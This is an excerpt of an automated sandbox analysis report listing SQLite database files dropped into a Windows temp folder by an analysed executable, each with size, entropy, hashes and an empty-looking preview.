                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Iy273yNZv0

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\J5kDmSf75W

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\JA5AT1u5DF

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\JZoebloJZ8

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Jh9vLhtxge

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\JpfGtQibEG

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Jr7p1HNGya

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Jsfx1xrCyc

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\KCNqR3CzNk

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Ka3c7mbNwX

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Keqwn0TXbG

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Khmnr0w4ha

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\L1V4yQEzLW

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\L7G5mM5UT4

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\LCEJ8GElJY

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\LHXGAth06i

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\LIVy90uW9v

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\LIpOMKFoQP

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\LKKHoDln1K

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\LKlUSOjj9W

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\LQR34raBuq

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\LR4YJiZbbl

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\LTH5V28aAg

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
